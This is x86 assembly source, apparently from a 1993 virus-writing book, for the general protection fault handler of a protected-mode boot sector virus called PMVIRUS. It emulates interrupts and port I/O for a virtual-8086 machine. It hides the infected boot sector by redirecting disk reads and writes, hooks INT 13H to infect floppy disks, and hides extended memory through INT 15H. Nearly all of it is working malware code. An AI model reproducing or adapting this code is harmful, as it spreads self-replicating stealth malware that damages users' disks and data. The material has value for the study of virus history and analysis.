;*******************************************************************************
;* This is the general protection fault handler. It is the main handler for    *
;* emulating real mode interrupts, and i/o. It is Interrupt Vector D in        *
;* protected mode.
;*******************************************************************************

;For use in PMVIRUS.ASM.

;(C) 1993 American Eagle Publications, Inc., All rights reserved!


GENERAL_FAULT:
                push    ebp
                mov     ebp,esp                 ;set up stack frame
                push    esi
                push    eax                     ;save registers
                push    ebx
                push    ecx

                mov     ax,BIOS_SEL             ;es lets us look into the VM
                mov     es,ax

                xor     ebx,ebx
                mov     bx,[ebp+12]             ;cs of call (VM style)
                shl     ebx,4
                add     ebx,[ebp+8]             ;ebx points to offending instr
                mov     eax,es:[ebx]            ;get that instruction

;Handle INT XX instructions here--we reflect them all back to the VM.
GPF_1:          cmp     al,0CDH                 ;is it an INT XX instruction?
                jne     GPF_2                   ;no, check for next offender

                cmp     ah,15H                  ;is it interrupt 15H?
                jz      INT15_HANDLER

                cmp     ah,13H                  ;if a disk access
                jnz     SHORT GPF_12
                call    FLOPPY_INFECT_CHECK     ;then check for infecting floppy
                jmp     SHORT GPF_15

GPF_12:         cmp     ah,0FFH                 ;return from floppy infect?
                jnz     SHORT GPF_15            ;nope, go on
                cmp     cs:[INFECT_FLG],1
                jnz     SHORT GPF_15
                jmp     FLOPPY_INFECT_RETURN

GPF_15:         push    eax                     ;save interrupt number
                xor     ebx,ebx
                mov     bx,[ebp+24]             ;get VM ss
                shl     ebx,4                   ;make absolute @ from it
                mov     ecx,[ebp+20]            ;get VM sp
                sub     ecx,6                   ;adjust stack here
                add     ebx,ecx                 ;absolute @ of stack in ebx
                mov     eax,[ebp+16]            ;get flags from VM caller
                mov     es:[ebx+4],ax           ;put flags on VM stack
                and     eax,0FFFFFDFFH          ;cli
                mov     [ebp+16],eax            ;save flags with cli for return
                mov     ax,[ebp+12]             ;get VM cs
                mov     es:[ebx+2],ax           ;save it on VM stack
                mov     eax,[ebp+8]             ;get VM ip
                add     eax,2                   ;update it to point to next instr
                mov     es:[ebx],ax             ;save it on VM stack
                mov     [ebp+20],ecx            ;and update it
                pop     ebx                     ;get interrupt number back now
                mov     bl,bh
                xor     bh,bh
                shl     ebx,2                   ;calculate address of int vector
                mov     eax,es:[bx]             ;get it in ax
                mov     [ebp+8],ax              ;save VM int handler as return ip
                shr     eax,16
                mov     [ebp+12],ax             ;and return cs
                jmp     GPF_EXIT                ;all done, get out

;Handle i/o requests here. The only reason we should get i/o requests here is
;if (1) an i/o port that is larger than our IO Permission Bit Map is requested,
;or if (2) the disk command port (1F7) is requested.
GPF_2:          cmp     al,0ECH                 ;in al,dx
                jnz     SHORT GPF_3
                in      al,dx
                mov     [ebp-8],al
                jmp     SHORT GPF_SKIP
GPF_3:          cmp     al,0EDH                 ;in ax,dx
                jnz     SHORT GPF_4
                in      ax,dx
                mov     [ebp-8],ax
                jmp     SHORT GPF_SKIP
GPF_4:          cmp     al,0EEH                 ;out dx,al
                jnz     SHORT GPF_5
                cmp     dx,1F7H                 ;disk drive command port?
                jnz     SHORT GPF_41            ;no, continue
                call    DISK_COMMAND            ;yes, special processing needed
GPF_41:         mov     al,[ebp-8]
                out     dx,al
                jmp     SHORT GPF_SKIP
GPF_5:          cmp     al,0EFH                 ;out dx,ax
                jnz     SHORT GPF_6
                mov     eax,[ebp-8]
                out     dx,ax
                jmp     SHORT GPF_SKIP
GPF_6:          cmp     al,0E4H                 ;in al,nn
                jnz     SHORT GPF_7
                push    edx
                xor     edx,edx
                mov     dl,ah
                in      al,dx
                mov     [ebp-8],al
                pop     edx
                jmp     SHORT GPF_SKIP2
GPF_7:          cmp     al,0E5H                 ;in ax,nn
                jnz     SHORT GPF_8
                push    edx
                xor     edx,edx
                mov     dl,ah
                in      ax,dx
                mov     [ebp-8],ax
                pop     edx
                jmp     SHORT GPF_SKIP2
GPF_8:          cmp     al,0E6H                 ;out nn,al
                jnz     SHORT GPF_9
                push    edx
                xor     edx,edx
                mov     dl,ah
                mov     eax,[ebp-8]
                out     dx,al
                pop     edx
                jmp     SHORT GPF_SKIP2
GPF_9:          cmp     al,0E7H                 ;out nn,ax
                jnz     SHORT GPF_10
                push    edx
                xor     edx,edx
                mov     dl,ah
                mov     eax,[ebp-8]
                out     dx,ax
                pop     edx
                jmp     SHORT GPF_SKIP2
GPF_10:         jmp     SHORT FAULT_REPORT

GPF_SKIP2:      inc     DWORD PTR [ebp+8]
GPF_SKIP:       inc     DWORD PTR [ebp+8]       ;skip offending instruction
GPF_EXIT:       pop     ecx
                pop     ebx
                pop     eax
                pop     esi
                pop     ebp
                add     esp,4                   ;get error code off of stack
                iretd                           ;and return to V86 mode

;Report unknown General Protection fault to console.
FAULT_REPORT:
                push    eax
                mov     ax,VIDEO_SEL
                mov     es,ax
                mov     ax,DATA_1_SEL
                mov     ds,ax
                mov     edi,0
                mov     esi,OFFSET GPF_REPORT
                call    DISPLAY_MSG
                pop     eax
                call    DISPLAY_NUMBER
                mov     esi,OFFSET CSIP_REPT
                call    DISPLAY_MSG
                xor     eax,eax
                mov     ax,[ebp+12]
                call    DISPLAY_NUMBER
                mov     ah,0EH
                mov     al,':'
                mov     ebx,0
                CALL    VIDEO_SERVICE
                mov     ax,[ebp+8]
                call    DISPLAY_NUMBER
                jmp     $

GPF_REPORT      DB      'General Protection Fault: ',0DH,0AH
                DB      'Offending instructions: ',0
CSIP_REPT       DB      0DH,0AH,'Offending CS:IP: ',0

;This routine handles i/o to the hard disk command port 1F7H. Basically, it
;just redirects reads/writes from Trk 0, Hd 0, Sec 1 to Trk 0, Hd 0, Sec 10.
;Any others it leaves alone. If this virus is live in the system then the
;hard disk IS infected. Thus, we ALWAYS re-direct reads/writes.

READ_CMD        EQU     20H
WRITE_CMD       EQU     30H

DISK_COMMAND:
                push    eax
                mov     eax,[ebp-8]             ;get ax for out function
                cmp     al,READ_CMD
                jz      DC_RDWR
                cmp     al,WRITE_CMD
                jnz     DC_EXIT
DC_RDWR:        mov     dx,1F4H
                in      al,dx                   ;build cylinder number
                mov     cl,al
                inc     dx
                in      al,dx
                mov     ch,al
                cmp     cx,0                    ;cylinder 0?
                jnz     DC_EX                   ;nope, no redirect necessary
                inc     dx
                in      al,dx                   ;get head number
                and     al,0FH
                jnz     DC_EX                   ;not head 0, no redirect necessary
                mov     dx,1F3H
                in      al,dx                   ;get sector number
                cmp     al,REAL_SECTORS+PROT_SECTORS+3
                jnc     DC_EX                   ;not a virus sector
                add     al,REAL_SECTORS+PROT_SECTORS+1  ;redirect attemted read
                out     dx,al                   ;and update it
DC_EX:          mov     dx,1F7H                 ;go back to command register
DC_EXIT:        pop     eax
                ret

;This routine handles interrupt 15H attempts. We have to be careful there
;because INT 15H can attempt to go into protected mode, and we don't want
;that!
;Right now, this modifies the action of 2 functions. Function 87, which
;transfers data to/from high memory is simply disabled. It attempts to go into
;protected mode, and that cannot be allowed. Function 88, which reports the
;size of high memory is set up to return 0 size, regardless of how much memory
;there really is.
INT15_HANDLER:
                push    eax
                mov     eax,[ebp-8]
                cmp     ah,87H                  ;don't allow function 87 to work
                jnz     INT15_88
                pop     eax                     ;since it goes to prot mode
INT15_87:       mov     eax,[ebp+16]            ;get flags
                and     al,0FEH                 ;clear carry
                mov     [ebp+16],eax            ;and save this
                xor     eax,eax
                mov     [ebp-8],eax             ;set ax=0 for return
                jmp     GPF_SKIP2

INT15_88:       cmp     ah,88H
                pop     eax
                jnz     GPF_15
                jmp     SHORT INT15_87

;This routine monitors Interrupt 13H to see if a floppy is being accessed.
;If so, and if the floppy motor is off, it attempts to infect. The jump to
;V86 mode and back to use Int 13 for infecting is a little tricky!

INFECT_FLG      DB      0                       ;tells GPF handler we're in floppy infect routine

FLOPPY_INFECT_CHECK:
                cmp     dl,80H
                jnc     FIC_RET                 ;hard disk, forget infecting
                pushad
                mov     ebx,43FH
                mov     al,es:[ebx]
                mov     cl,dl
                shr     al,cl
                and     al,1                    ;motor off returns Z here
                jnz     FIC_RET1                ;motor on, forget it.
                push    es
                pop     ds                      ;ds=BIOS_SEL
                mov     ax,DATA_1_SEL
                mov     es,ax

;Move code in low memory up for storage
                mov     edi,7C00H-REAL_SECTORS*200H-PROT_SECTORS*200H-BUF_SIZE*200H
                mov     esi,edi
                add     esi,90000H              ;point to 9000H:REAL_SECS
                add     edi,8000H               ;don't overwrite this code!
                mov     ecx,200H*(REAL_SECTORS+PROT_SECTORS+BUF_SIZE+1)
                rep     movsb
                xor     esi,esi                 ;save current int vec table
                mov     edi,400H
                mov     ecx,100H
                rep     movsd

;And move code up here down to low memory to execute
                mov     esi,7C00H-REAL_SECTORS*200H-PROT_SECTORS*200H-BUF_SIZE*200H
                mov     edi,90000H
                add     edi,esi
                push    ds
                push    es
                pop     ds
                pop     es
                mov     ecx,200H*(REAL_SECTORS+PROT_SECTORS+BUF_SIZE+1)
                rep     movsb
                xor     esi,esi                 ;restore old int vec table too
                xor     edi,edi                 ;all vectors here point to ROM
                mov     ecx,100H
                rep     movsd

                mov     ebx,TSS_2+4
                mov     [ebx],esp               ;modify pl0 stack on the fly
                mov     [INFECT_FLG],1          ;set infect flag
                mov     eax,9000H               ;set up segments on stack now
                push    eax                     ;gs
                push    eax                     ;fs
                push    eax                     ;ds
                push    eax                     ;es
                push    eax                     ;ss
                mov     ebx,7C00H               ;set up vm stack on stack
                push    ebx                     ;esp
                mov     ebx,[ebp+16]            ;set up vm flags on stack
                push    ebx                     ;eflags
                push    eax                     ;set up cs on stack
                mov     eax,OFFSET INFECT_FLOPPY;and eip on stack
                push    eax                     ;eip
                iretd                           ;and "return" to INFECT_FLOPPY

FLOPPY_INFECT_RETURN:
                mov     ax,DATA_1_SEL
                mov     ds,ax                   ;es=BIOS_SEL when we get here
                mov     [INFECT_FLG],0          ;reset this flag
                mov     ebx,TSS_2+4
                mov     esp,[ebx]
                mov     DWORD PTR [ebx],OFFSET TASK2_STACK0+STACK_SIZE

;Now restore code that was in low memory
                mov     esi,7C00H-REAL_SECTORS*200H-PROT_SECTORS*200H-BUF_SIZE*200H
                mov     edi,90000H
                add     edi,esi
                add     esi,8000H
                mov     ecx,200H*(REAL_SECTORS+PROT_SECTORS+BUF_SIZE+1)
                rep     movsb                   ;put code we saved back
                mov     esi,400H                ;restore old int vec table
                xor     edi,edi
                mov     ecx,100H
                rep     movsd

FIC_RET1:       popad
FIC_RET:        ret
